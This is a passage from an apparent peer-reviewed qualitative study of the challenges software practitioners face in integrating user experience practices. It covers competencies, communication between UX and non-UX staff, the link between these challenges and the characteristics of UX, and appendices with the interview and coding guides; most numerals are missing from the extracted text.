some practitioners related the difficulty in ux evaluation to the fact that users' expectations and their perception of a product change over time and are affected by various factors, e.g., the introduction of new technologies or the appearance of a competing product. one of the interviewees highlighted: "it's like when you try on new clothes. the shirt you were wearing going into the dressing room and looked fine, looks shabby when you've tried out the new shirt." (h- /hci). the interviewee used this analogy to explain the subjective and dynamic nature of expectations, and that for each individual a new experience can affect the user's perception of other products. another problem concerns difficulties in relating the results of laboratory evaluations to the real experience of users, and the role of context in forming experiences: "i think user tests tend to be more focused on pure usability. i guess it's when you're releasing
the product into the wild, that's when you start to get maybe the most valuable feedback or the most truthful ones. so it's often good to make some sort of what we call a beta product and publish it. let people interact with it. but that's a luxury also because that takes time. often, in many, many cases, you have to just make something work. in an ideal world you should have a testing phase, of course. to get the users' perspective. that should be really nice to have." (a- /hci). another problem concerns the relation between different episodes of experience, for instance the first impression of users and the ux after using the software for a while: "it's a fantastic feeling to sit in a brand-new car in a car shop. how do you feel about the same car if you've had it for a year, driving it around with two kids in the backseat, for instance? experiencing all of the quirks from the interior, and all the things that don't work, the stupid things that make your hands go dirty every time you're supposed to close a door, for instance? that's part of user experience design. so it's a very floating scale." (h- /hci).

theme 7. lack of consensus on ux-related competencies and responsibilities

figure: challenges concerning ux-related competencies and responsibilities (theme 7).

another group of challenges concerns the competencies and responsibilities required to perform ux practices (see fig. ). our data shows that for better ux work, organizations need to have access to a variety of competencies including brand management, visual design, usability engineering, interaction design, and emotional design. in particular, to be able to address the hedonic aspect of ux, it is crucial to have access to competencies for eliciting, refining, communicating, and testing be-goals or non-task-related needs of users. a group of interviewees believed that due to the wide spectrum of ux competencies, it is unlikely to find all of those competencies in any individual practitioner. this group therefore argued that all of the team members (with complementary competencies) should jointly take on the ux responsibilities. regarding this, one of the practitioners said: "i'm not sure if that should be a specific role [...] so everybody should have a ux focus now. i'm not sure if we can have some sort of ux guy [who takes the final decisions]." (a- /hci). this interviewee further emphasized that achieving a better ux requires a 'ux-mindset' that even the technical roles in the projects (e.g., programmers) should have.
on the other hand, a group of interviewees believed there is a need for specific practitioners with these multidisciplinary competencies because these competencies are tightly connected and hard to separate. this group therefore argued for defining specific ux-related roles and responsibilities in projects. regarding the importance of access to individuals with diverse competencies, an interviewee stated: "i, as an art director, have to have somewhat deep knowledge about ux, and also ixd ...you can't separate them." (a- /hci). another interviewee said: "you have to be knowledgeable in many areas. you have to be very holistic in the way you think about things, cause you have to speak with programmers in the language of programmers, to some extent, at least, to gain their respect, but also you have to be treated as an equal...you also have to understand business, and that side of software. you have to be a little bit of everything but you also have to be a specialist in your own domain so it's kind of like a juggling act." (h- /hci).

being able to gain an overall view of the ux design was one of the concerns highlighted in the interviews. according to the practitioners, this is often a difficult yet important prerequisite for creating a coherent ux. as the interviewees stated, to deal with the complexity of today's systems, the common approach in the software community is to break down the whole system into various sub-systems and work on them independently. such an approach can harm the ux of the software since, in these cases, ux practitioners often lose the overall view on the ux design, how these different sub-systems fit together as a whole, and how they individually and in combination contribute to the experience of the end users. regarding this, one interviewee emphasized: "you have to tear it down, yeah! but what happens to the whole? who is going to define the whole?" (e- /hci). the interviewees also highlighted that in agile settings, the decision-making process is spread out both over time as well as among the team members. this further complicates the process of creating a unified and coherent ux design (e.g., h- /hci). further, agile processes enforce a focus on a few pieces of the design at each iteration. regarding this, one interviewee said: "you need to deliver wireframes for parts of the application but you still do not know how it all will fit together at the end." (a- /hci).

similar to what we saw for competencies, our data shows that the responsibilities of ux practitioners are also very diverse. as some ux practitioners expressed, they have varying responsibilities in and contributions to different projects; this depends on factors such as management support, available resources, and timing. in one organization (c), the ux team is responsible for handling requirements and feeding them to the development teams. in another organization (g), the ux group is part of r&d, where the group mainly focuses on future products and the long-term vision of the company. one ux practitioner from company g described her responsibilities as: "that can loosely be described as discovery, research, overall strategy, and then high-level design." (g- /hci). in another organization (h), since the number of practitioners with ux knowledge is low, none of these practitioners are part of any particular project teams; instead, they are shared resources among projects.
ux practitioners are also often responsible for spreading knowledge and awareness about ux in the organization, or giving support to development teams concerning ux matters. regarding this, a practitioner expressed: "i think on a very high level, our responsibility is to inform, influence and inspire." (h- /hci). he further stated: "we contribute to the process by running workshops, by providing provocative questions, or providing examples, engaging in discussions in which people from other domains dig down really deep into their own layers of knowledge, and we can ask really simple questions to poke them with our perspective." (h- /hci).

theme 8. communication and collaboration gap between ux and non-ux practitioners

figure: challenges concerning communication and collaboration between ux and non-ux practitioners (theme 8).

this theme of challenges concerns how ux and non-ux practitioners communicate with each other and collaborate in projects (see fig. ). the interviewees generally agreed that better ux work requires early involvement of ux practitioners in projects. early involvement helps ux practitioners get first-hand information about the customer and the end users. in addition, practitioners get a chance to negotiate trade-offs between the design solutions and technical constraints. if required, a design concept can then be updated based on the developers' feedback. nevertheless, ux practitioners are often involved in projects only in later stages. regarding this, a practitioner stated: "the worst case is when someone has met a client and talked a lot about the software, then i meet this guy who has met the client ... then it's secondhand information and everything gets distorted." (a- /hci). early involvement is particularly important since in later stages it is difficult or even impossible to make effective changes to the ux design. as an interviewee stated: "on the personal level developers can be offended if someone thinks it's not a good solution, they can have a hard time killing their darlings, they could have been thinking of it as a very beautiful solution they have made with lines of code, so they don't want to throw it away." (h- /hci). some stakeholders, however, believe that ux can be improved with just minor gui changes in later stages of development; they therefore down-prioritize ux practices in earlier stages. the interviewees also highlighted that agile processes have a limited focus on strategic decisions such as the overall ux of the software.
often these strategic decisions are either 'skipped' or postponed since agile methodologies tend to prioritize immediate and current problem solving: "agile is a lot about problem solving and that's what sort of gets priority." (h- /hci). according to the interviewees, even in cases when ux practitioners are involved in early phases, they may lose their connection to the project in later phases. to overcome this problem, the practitioners proposed various solutions. one interviewee, for instance, stated that they rely on ux advocates in projects: "we are not ux experts that you hire if you want to give a problem to somebody, have them go away for three months, and then have them come back with the solution... if something needs to go into production after our principal work is finished, you need somebody who's going to be involved in that process and involved from the very beginning. so we have a very strong focus on collaboration...oftentimes, at least when it comes to transitioning into a production environment, we're looking for ux savvy development managers or developers." (g- /hci). another ux practitioner told us that throughout their projects, they continuously check the status of the ux design: "we try to have always at least one person who was part of the original dialog present during the weekly checkups, and basically just going by the desks and checking, informally." (a- /hci).

ux practitioners need to be involved in projects early on, and need to have an active role throughout the projects, which, in our interviewees' view, can lead to power struggles between ux and non-ux practitioners: "sometime it can be perceived as we're trying to take control of the situation." (h- /hci). this interviewee further emphasized that this often means that working with ux is more difficult than usability: "i think the reason why it was easier to work with usability to some extent was that you didn't take up any space. it was like being a woman in the early th century. you were there, but you didn't vote, you didn't do anything." (h- /hci). similarly, another interviewee said: "there are a lot of strong stakeholders that are really interested in doing those kind of things, programmers for instance, who like to be in control." (a- /hci). power struggles between ux and non-ux practitioners were also attributed to the different motivations of practitioners (e.g., a developer wanting to develop more efficient code vs. a designer wanting to create a better design). regarding this, a ux practitioner emphasized: "everyone wants to start with their own domain, as soon as possible, from day one. then, of course, you have the problem of ownership of the direction, where to go and what to do and why. that's something that we struggle with quite a bit." (e- /hci). similarly, another interviewee said: "i think there is an ongoing struggle, cause we all have different drivers; like my driver is always about making technology that is interesting, useful, and brings some sort of value to the users in the context in which it is being used." (h- /hci). this interviewee further emphasized that the situation has changed in their work as they moved from usability towards ux in recent years: "compared to when we only worked with usability, i would argue that the situation is rather different, and part of it has to do with, being part of the
early phases, but i think the biggest challenge and the biggest struggle nowadays is really the ownership of decision making, and who calls the shots ...because usability didn't disturb the big process, the big decision-making, the prioritization of what to do, or what constituted a feature that was needed to be implemented. usability wasn't part of that discussion. usability was always part of like, how you should make a font, or the colors, like lipstick on the pig!" (h- /hci).

better ux work requires regular communication and collaboration among ux and non-ux practitioners, which can sometimes be challenging since these two groups of practitioners often have different responsibilities, education, motivations, and constraints in their work. regarding the importance of communicating with designers, a developer stated: "i think we need to be working tighter with the design department to help them know what can be done." (d- /se). similarly, a ux practitioner said: "we really try to make this give and take ...we have constant communication, and i will say that we get always input from developers that we need to consider." (a- /hci). according to the ux practitioners, if they are disconnected from the technical roles, e.g., developers, they may not be aware of technological constraints when choosing and developing a design concept: "honestly the further we are away from the people that actually build the stuff, we run the real risk of becoming hand waving idiots." (g- /hci). another ux practitioner stated: "i realized quite early in my career that i have to communicate with these guys who program or develop something, and i have to understand what they're saying." (a- /hci). the interviewees, however, emphasized that overcoming this communication gap should be a two-way effort: "i'm not saying that we should be the only ones with this kind of multidisciplinary approach. i think the other ones should also have that, that's a big challenge, i would say." (h- /hci). similarly, another practitioner said: "so i have to have some sort of knowledge about the technology because i have to know what my limitations are .... i have to have some sort of technical know-how so i can communicate with developers. i expect the same from them. so they realize that the aesthetic choice has to be made and it can take time." (a- /hci). according to the practitioners, in order to facilitate better communication, ux practitioners need to acquire basic knowledge about various technical topics, e.g., programming, testing, architecture, etc. as emphasized by one respondent: "you have to be like knowledgeable in many areas...you have to be very holistic in the way you think about things, cause you have to speak with programmers in the language of programmers, to some extent...you also have to understand the business." (h- /hci). similarly, another practitioner stated: "you have to speak in an engineering language. that's a real challenge for ux work, because you always have to translate it to terms that makes sense to an engineer or economist." (a- /hci). the respondents also emphasized that communication between ux and non-ux practitioners can be challenging because of a lack of trust in ux practitioners. regarding this, one interviewee emphasized: "we have had problems with some of the developers sometimes. it has been a bit of conflict. i think we have some work to do to really get a 'we-feeling' that we, together, are developing an awesome product." (c- /hci).
one practitioner attributed this lack of trust to the fact that ux is a relatively new and less established field compared to the technical fields, e.g., se. this also means that ux practitioners are often younger and less experienced than non-ux practitioners: "most ux practitioners are quite young still, i do not think they have been that long in the market for development of their competencies yet." (a- /se). one ux practitioner emphasized that they can gain more trust over time and as they accomplish more in their work: "[over time] we are adding on the pile of what we would call successful things we have done, and of course that gives us a bit more 'trust' i could say." (h- /hci).

discussion

in this section, we answer the research questions and describe the implications of our findings for research and practice. we use hassenzahl's model of ux and his proposed list of ux characteristics as an analytical lens to investigate the challenges in greater detail.

in answer to rq1 (what challenges do practitioners face when integrating ux practices into software development processes and organizations?), we found eight themes of challenges, as depicted in fig. . some of these themes are more fundamental and concern the views, attitudes and knowledge of stakeholders (theme 1, theme 2, theme 4, and theme 7) while others are more tactical (theme 3, theme 5, theme 6, and theme 8). there is clearly a multifaceted and complex set of relations between the themes. these interrelations are discussed here to the extent supported by our data; more empirical data should be gathered in the future to elaborate and validate these connections. at a high level, the more fundamental themes can explain the tactical themes. a limited knowledge of ux (theme 1) is likely also connected with the low impact of ux models in industry (theme 3). in addition, a lack of a common reference and knowledge base can lead to a language gap, meaning that the concepts of ux and ux practices can mean different things to different people. this gap may contribute to communication problems within software development organizations (theme 8). through a lopsided emphasis on functionality and actual quality characteristics (theme 4), we can explain the identified challenges concerning ux-related requirements (theme 5) and testing (theme 6). requirements and testing challenges can also be attributed to limited tools, methods and competencies, and communication issues (theme 3, theme 7, and theme 8). even if companies intend to focus more on ux, they do not always have the capability (e.g., competencies) to turn this intention into action. moreover, even if ux practitioners with the right competencies are present in an organization, they often face power struggles and a lack of trust and therefore fail to effectively communicate and collaborate with non-ux practitioners.

in answer to rq2 (how do ux challenges relate to challenges of handling software quality characteristics, in particular usability?), we found that there are in fact various overlaps between the identified themes and the challenges reported for handling usability and/or software quality characteristics in general. however, despite similarities at a superficial level, we differentiate the challenges through the characteristics of ux: subjective, holistic, context-dependent, temporal and worthwhile.
in particular, through these characteristics, we highlight the inherent differences between ux and other quality characteristics, including usability, and explain the lopsided focus of the software industry on usability and the pragmatic aspect of ux. while previous empirical studies report that usability is not understood properly, especially among technical stakeholders (e.g., bak et al., ), we observed that in the studied organizations practitioners have fair knowledge and awareness about usability. this can be an indication that industrial knowledge and awareness of usability is improving. in the case of ux, however, the same level of maturity is not yet achieved in industry, and organizations struggle with knowledge and awareness concerning (i) the concept of ux and how it differs from usability, (ii) the potential of ux, in particular its hedonic aspect, to add value to software, (iii) existing ux theories, tools and methods, and how to apply them in current development processes, (iv) the competencies required for ux work, (v) handling ux-related responsibilities, and (vi) handling communication and collaboration among ux and non-ux practitioners.

previous research shows that usability and purpose of use often dominate over ux in the software industry (väänänen-vainio-mattila, roto & hassenzahl, ; kuusinen & väänänen-vainio-mattila, ). however, an explanation for why this is the case is missing in the current body of knowledge. we observed a similar trend in the studied organizations. we additionally found explanations for this lopsided focus by investigating how the characteristics of ux impact the day-to-day work of practitioners. these characteristics were in fact also highlighted by the interviewees when describing the challenges or discussing their work with ux, mainly in comparison to usability. some examples of the interviewees' quotations in relation to these characteristics are shown in table . it is not surprising that these characteristics were pointed out only by those interviewees who have knowledge and experience of ux. below, we clarify how our practitioners experience the implications of these characteristics in their work with ux (see table for a summary). in total, we identified a number of such difficulties that mainly concern requirements and testing activities in software development. as shown in table , some of these implications have been previously reported in the literature. however, to the best of our knowledge, the remaining nine implications are unique to our study. clearly, our study did not focus on identifying these implications, and further research is needed to provide a more comprehensive understanding of them and their interconnections.

the holistic nature of ux requires addressing not only do-goals but also be-goals. practitioners, however, believe that eliciting be-goals and translating them into requirements and design solutions is more difficult than for functionality or other quality characteristics. one explanation may be that practitioners disagree on whether they should identify and refine these be-goals in parallel, before, or after other do-goals, including functionality. another explanation may be that these practitioners have limited access to guidelines, tools and methods for treating be-goals in their work.
table : ux characteristics and their implications for the identified challenges, as supported by our data (characteristic: sample quote regarding challenges).

subjective: "it is difficult to sort out or really get the correct feeling that the user has because they will try to explain it but it perhaps is not the real emotion that we catch at the end, if it would be a method or approach to really get these from the user that would be great." (a- /hci)
holistic: "functional requirements are easy to create, to merge into a design; more emotional things are more difficult." (f- /hci)
dynamic: "it's a fantastic feeling to sit in a brand-new car in a car shop. how do you feel about the same car if you've had it for a year, driving it around with two kids in the backseat, for instance? experiencing all of the quirks from the interior, and all the things that don't work, the stupid things that make your hands go dirty every time you're supposed to close a door, for instance? that's part of user experience design. so it's a very floating scale." (h- /hci)
context-dependent: "i think user tests tend to be more focused on pure usability. i guess it's when you're releasing the product into the wild, that's when you start to get maybe the most valuable feedback or the most truthful ones. so it's often good to make some sort of what we call a beta product and publish it. let people interact with it. but that's a luxury also because that takes time. often, in many, many cases, you have to just make something work. in an ideal world you should have a testing phase, of course. to get the users' perspective. that should be really nice to have." (a- /hci)
worthwhile: "if i start with 'how', i will never get to the 'why'. if i start with 'what', with just making things, i will totally miss every important point there is. for me it tends to be very, very useful to focus on the why. so if i can sort of see this why, even if it's very, very unclear, i can sort of approach this 'how' and 'what' in a much better way." (g- /hci)

table : in relation to the characteristics of ux, we identified the following implications. these implications can explain the extra difficulties that practitioners face in their work with ux compared to other quality characteristics, including usability.
ux characteristics implications (i.e., extra difficulties) as perceived by practitioners • ux relies on human subjective perception • ux is temporal and there is a complex relation between various episodes of experience • ux emerges from complexly intertwined underlying elements • ux includes both hedonic (be-goals) and pragmatic (do-goals) aspects • ux is unique and situated in the context • ux is worthwhile, about adding value, and more than just preventing problems and frustrations • ux work is perceived to be morea visible in the development process than usability work (our finding) • abstract ux-related needs (e.g., be-goals or emotional needs) are difficult to refine and translate into more concrete ones (our finding) • it is hard to translate abstract ux-related needs to concrete design solutions (our finding) • it is hard to frame ux in evaluations because of all the complex underlying dependencies between its elements (our finding) • there is a lack of consensus among practitioners on whether abstract ux-related needs should be elicited before, after or in parallel with other needs (our finding) • translating abstract ux-related needs (in particular for the hedonic aspect) to measurable requirements is perceived to be more difficult than for functionalities or other quality characteristics (our finding) • compared to the case of usability, more power struggles, and disagreements are perceived to rise between ux and non-ux practitioners (our findings) • it is perceived to be more difficult to decide between design alternatives and resolve power struggles and disagreements that can arise between ux and non-ux practitioners (our findings) • requirements related to the hedonic aspect of ux are either neglected or treated informally (our findings) • ux-related needs of users are abstract concepts (literature, our finding) • practitioners do not have access to standardized and agreed upon set of ux measures and metrics (literature, our finding) • field studies are crucial in ux work, in particular to gather authentic user experiences but are perceived to be more resource demanding (literature, our findings) • creating and using more sophisticated prototypes are vital in ux evaluations but are perceived to require more resources (literature, our finding) • practitioners are skeptical about effectiveness and reliability of current ux evaluation methods (literature, our finding) • practitioners do not always have access to enough users (literature, our finding) • practitioners do not always have access to sophisticated prototypes in earlier phases (literature, our finding) • practitioners do not often know how to measure the whole ux in relation to its underlying elements (literature, our finding) • users’ memory of their experience is prone to fabrication and fading (literature, our finding) • a deeper understanding of the relation between ux and time is missing (literature, our finding) • a deeper understanding of the relation between ux and memory is missing (literature, our finding) notes. aadmittedly, we are not drawing any quantitative conclusion from our qualitative data. here, we merely aim to emphasize the interviewees’ perception of different issues. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
(desmet, overbeeke & tax, ) for gathering users’ momentary emotions about the interaction and ux curve (kujala et al., ) for long-term ux evaluation have been introduced but they are not widely accepted in industrial software development. we therefore highlight a need for more research on developing industry-relevant guidelines, tools and methods for identifying and selecting underlying hedonic and pragmatic elements of ux not only for measurement purposes but also for requirements and design activities. practitioners were also generally skeptical about the ability to address the subjective nature of ux in evaluations. for instance, our interviewees were concerned that what a user remembers about his or her emotions and shares in interviews or observations may not reflect the reality. our interviewee’s concern confirms the findings of law, van schaik & roto ( ). practitioners believed that the most truthful data about experience and perception of users can only be gathered in the field, and through using a functional version of the product in a real situation. however, field studies are too resource demanding (vermeeren et al., ) and not feasible in all projects. we additionally found that despite skepticism about interviews and observations, these methods are common in industry. moreover, organizations often resist introducing more novel tools and methods for various reasons including the cost of these tools and methods, or lack of knowledge and awareness about their value. in addition, our interviewees found it difficult to evaluate ux because of its subjectivity. they emphasize that while there is a great need to involve the end users in evaluations, accessing them in projects is often rare. limited access to the end users is a known and persistent problem in the industry (bak et al., ). however, we argue that compared to usability work, ux work is, to a larger extent, impacted by this limitation. according to the current studies, to reduce the impact of subjectivity on evaluations and to generate less biased and more reliable results (i) more users need to be involved in evaluations for statistical significance (law, van schaik & roto, ), and (ii) other stakeholders (e.g., developers) cannot act as substitutes for users in evaluations because they are biased towards the software being developed by their organizations (locascio et al., ). on the other hand, the limitations of access to end users and competencies can be easier to overcome in the case of usability through involving limited number of users (e.g., involving five users in usability tests (nielsen, )) or using internal stakeholders as test subjects (locascio et al., ). also, our interviewees found it difficult to evaluate subjective and holistic experiences of users because access to functioning or complete prototypes is often rare in earlier phases of projects. one solution is to apply evaluation tools and methods that do not require functioning or complete prototypes but rely on practitioners’ imagination of how users may perceive the design, which is however an open research topic (vermeeren et al., ). we also saw practical difficulties concerning handling the relation between different episodes of experience. it is important to take this relation into account in evaluations because of the dynamic nature of ux. the practitioners lacked knowledge and expertise on finding a balance between short- and long-term experiences in both design and evaluation. 
hence, we agree with law, van schaik & roto ( ) that the community still lacks enough understanding of the relation between ux, time and memory (the kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implications of the subjective and dynamic nature of ux), and suitable ux metrics and measures that can support this relation are lacking. the ux practitioners brought up the worthwhile (i.e., positive) nature of ux mainly when discussing their approach to requirements and design. the ux practitioners believed this aspect of experience (i.e., the value) or the ‘why’ behind developing the software for the end users, should be identified before the ‘how’ and ‘what’ that is connected to usability and functionality. nevertheless, this view is often in conflict with traditional and common approaches to software development that focus on identifying functionality or other quality characteristics (chung et al., ). the practitioners also pointed to the worthwhile nature of ux when describing their way of working and priorities. while the ux practitioners emphasize the software value from both the user and business perspective, non-ux practitioners often tend to merely focus on the business perspective which can create tensions between ux and non-ux practitioners. in particular, since practitioners still do not have enough knowledge, or tools and methods to make informed trade-offs between these two perspectives. for instance, to deliver a certain experience, ux practitioners may suggest one design solution to support specific user needs, but business stakeholders may suggest another solution to support specific business goals. while previous empirical studies report limited access to usability professionals (e.g., bak et al., ), the organizations we studied seem to have enough access to usability competencies which may indicate a general improvement of usability work in the industry. however, these organizations suffer from limited access to ux competencies, in particular concerning the hedonic aspect of ux and addressing various be-goals. to overcome the lack of ux and usability competencies, current research suggests simplifying well-known testing methods and training developers to perform them (oevad & larsen, ). while this approach is shown to be useful in the case of usability and the pragmatic aspect of ux (locascio et al., ; oevad & larsen, ), this is not necessarily the case for the hedonic and more subjective aspect of ux. for instance, as mentioned before, developers’ bias is shown to compromise the validity of testing results because developers are loyal to the products they develop and their organizations (locascio et al., ). in the studied organizations, the responsibilities of usability professionals are well understood and defined while there are uncertainties concerning the ux-related responsibilities. in addition, our interviewees perceive that power struggles appear more often and are more difficult to resolve for ux than for usability. previous studies report power struggles between developers and designers as a challenge to ux and usability work (chamberlain, sharp & maiden, ) but do not give explanations for why this is the case. here, we give more empirical support for this challenge, and additionally provide explanations for it. one explanation can be that ux responsibilities are diverse and can overlap the work of non-ux practitioners such as business and requirements analysts. 
another explanation is that all stakeholders experience different products and services on a day-to-day basis. therefore, non-ux practitioners can easily have opinions about what experiences the software should deliver, and how they should be delivered, i.e., through which design kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. solutions. this can lead to power struggles even in cases when there is no overlap between ux and non-ux responsibilities. another explanation may be that ux practitioners should be involved early on and throughout projects, and their responsibilities involve strategic decision making hence the work of ux practitioners is more visible in projects as our interviewees emphasized. the practitioners believed they can partially overcome the power struggles by increasing ux knowledge and awareness in organizations, and informing other stakeholders about ux responsibilities (what, why and how of ux practices), especially in relation to the overall strategies of the organization. in contrast to what we discussed above for ux, practitioners can test other software quality characteristics in labs, and even without necessarily using a sophisticated prototype of the software or even involving the end users. for example, usability can be tested on simple paper prototypes, using heuristic or other expert evaluations, or performance problems can be minimized through the use of software performance prediction approaches in earlier phases (balsamo et al., ). in the case of other software quality characteristics, the focus is on actual measures and values not the users’ subjective perception of these values. additionally, in contrast to ux, other quality characteristics are not dependent on time. for instance, performance or security measurements will have the same results even when repeated over time, provided that the software, and the test context (e.g., cpu load) have not changed. in other words, the difficulties we discussed above concerning requirements and testing of ux are either less severe or not even present for other quality characteristics, making their practice less challenging as perceived by our participants. limited access to the end users and competencies are also less critical when addressing usability. power struggles can be resolved using objective evidence that shows why an alternative is better than another. this can for instance be achieved through measurements which is possible for other quality characteristics, including usability, at least in theory. however, as we saw, measuring ux is difficult and even impossible in earlier phases. in addition, ux metrics and measures are not agreed upon or standardized, yet for other quality characteristics, practitioners have access to standards, e.g., iso/iec - (international organisation for standardisation (iso), ). therefore, in the case of ux, it is difficult to decide among various alternatives in order to resolve the power struggles. furthermore, the importance of the pragmatic and hedonic aspects of ux varies in different projects. for instance, maximizing efficiency is not always relevant for the software being designed, and not every software is required to support different be-goals such as curiosity, motivation, interest or fun. similarly, different characteristics of ux have different importance in different projects. 
while the first impression (i.e., temporality) may be more important for an e-commerce software, an e-learning software may require more focus on motivation (i.e., situatedness). we however argue that practitioners need to have sufficient knowledge and awareness on the hedonic and pragmatic aspects, ux characteristics, and be-goals to be able to make an informed decision regarding their relevance and importance in various projects. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. our study contributes to the current body of knowledge through identifying the overlaps in challenges of ux and other quality characteristics, in particular usability. these overlaps underline the significance of these challenges and call for more research on how to overcome them in practice. by highlighting these overlaps, we can help identify research areas for improving the work of ux as well as software quality in general. we can also make it easier for practitioners to spot, better understand, as well as find mitigation strategies for ux challenges by learning from past experiences and developments in the area of software quality. in addition, our study contributes to the current body of knowledge through connecting the challenges to the ux characteristics and clarifying the implications of these characteristics in day-to-day work of practitioners, in particular in comparison to usability and other quality characteristics. based on our work, there are at least three future studies that could be particularly interesting. first, it would be relevant to conduct an in-depth study to investigate various approaches that the academics or practitioners propose or apply to address the identified challenges, most importantly in relation to the characteristics of ux, and different software development cultures. second, it would also be valuable to examine the differences between ux and other quality characteristics, and their associated practices in more depth through a deeper case study. we have reported on the similarities and differences between ux and other quality characteristics to the extent supported by our data. because of the explorative nature of this study our data does not support details about how the studied organizations handle various quality characteristics in their day-to-day work. third, we did not study how the type of software being developed (e.g., leisure vs work) may impact the identified challenges in the studied organizations. investigating the correlation between the types of software and practices and challenges is an interesting future research direction. investigating this correlation can help organizations better understand the cause and effect of the challenges and better plan for addressing them. conclusion designing and developing for ux is a multidimensional and multidisciplinary activity which has not yet gained an established position in the software industry. many development companies still fail to deliver good ux in their products and services, and practitioners in these companies face various challenges when dealing with ux throughout their projects. although ux is different from usability, many of the present frameworks and guidelines for ux integration do not clearly separate these two concepts. moreover, the perception of ux generally differs in academic and industrial contexts: whereas the former concentrates on the hedonic aspect and emotions, the latter focuses more on functionality and usability issues. 
our study shows that approaches for integrating ux into software development require further development. in particular, we showed that the characteristics of ux (hassenzahl, ), i.e., subjective, holistic, dynamic, context-dependent, and worthwhile play an important role in shaping ux challenges. we provided a deeper analysis of ux challenges through the lens of the aforementioned ux characteristics. these characteristics have at least implications for the day-to-day kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. work of practitioners. to the best of our knowledge, nine of these implications have not been previously reported, and are unique to our study. through these implications, we explained the extra difficulties practitioners face in their work with ux compared to usability and other quality characteristics. we could also explain the lopsided focus of industry on the pragmatic aspect of ux. the related work does not provide such an analysis nor does it often make such a differentiation between ux and usability except for the few studies we summarized the related work. we therefore bring depth to the identified challenges by presenting their relation to the ux characteristics. we hope to have helped the community to identify ways to systematically improve the current ux. to make future progress with integrating ux practices into software development processes, the community needs to take into account these ux characteristics and their implications for the day-to-day work of practitioners when developing guidelines, tools and methods to address related challenges. practitioners need to be aware of the ux characteristics not only in evaluations but also requirement and design activities. it is also of crucial importance to understand and address the impact of these characteristics on communication and collaboration between ux and non-ux practitioners. admittedly, the importance of the pragmatic and hedonic aspects of ux is different in projects. nevertheless, practitioners need to be aware of the differences between these aspects, and various ux characteristics to make an informed decision in each project regarding where to focus and why. the challenges and implications we present in this paper can guide future research on ux integration and creating more awareness concerning ux, and related challenges in the software industry. our findings can also shed light on the more general problem of how practitioners should integrate new and less mature knowledge areas, of which software quality characteristics and ux are examples, into software development processes. acknowledgements the authors would like to thank all the organizations and in particular practitioners who participated in this study. appendix a. interview guide general questions • what is your education and work background? • what is your role in this company? • how many years have you had this role? • do you know any of these terms (see appendix c)? if yes, how do you apply them in your work? • how do you define ux? • how do you define usability? kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. questions related to requirements • how is the overall requirements process in your company? • how do you approach functional requirements? • how do you approach non-functional/quality requirements? • how do you approach requirements related to ux? 
• what challenges do you face in your work regarding requirements related to ux? questions related to design • how is the overall design process in your company? • how is ‘design’ related to ‘requirements’ in your work? • what challenges do you face in your work regarding design, in particular in relation to ux? questions related to evaluation or testing • how is the overall evaluation/testing process in your company? • how do you test functional requirements? • how do you test non-functional requirements? • how do you test ux? • what challenges do you face in testing ux, or requirements related to ux? appendix b. coding guide • every segment can have any number of applicable codes • the codes should be selected from the list below. if a new concept appears in data the possibility of adding a new code should be discussed among the authors. • any uncertainty in coding a segment should be discussed among the authors. list of codes . challenges . solutions . ux . usability . ux vs usability . motives . definition . organization . project . software . process . individuals . tools and methods . roles . responsibilities . collaboration kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . communication . requirements . evaluations appendix c. terminology table the interviewees were asked to specify each and every term they know and whether they apply it in their work. they were also asked to add any relevant term that is missing from the list. • usability • user experience • quality in use (qiu) • emotional design • pleasurable design • aesthetics of design • affective computing • affective design • usability requirements • ux requirements • affective requirements • emotional requirements • user values • user emotions • user motivations • iso/iec • iso/iec • hedonic and pragmatic • instrumental and non-instrumental additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • pariya kashfi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • agneta nilsson and robert feldt conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the raw data includes the interviewee recordings and transcripts which because of nda between chalmers university and collaborative industries (i.e., companies who participated in the interviewees) are not allowed to be shared with any third party. more quotations are included and the coding process is elaborated to address this issue partially. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abrahão s, juristo n, law el-c, stage j. . interplay between usability and software development. journal of systems and software ( ): – doi . /j.jss. . . . alves r, valente p, nunes nj. . the state of user experience evaluation practice. in: proceedings of the th nordic conference on human–computer interaction: fun, fast, foundational (nordichi ’ ). 
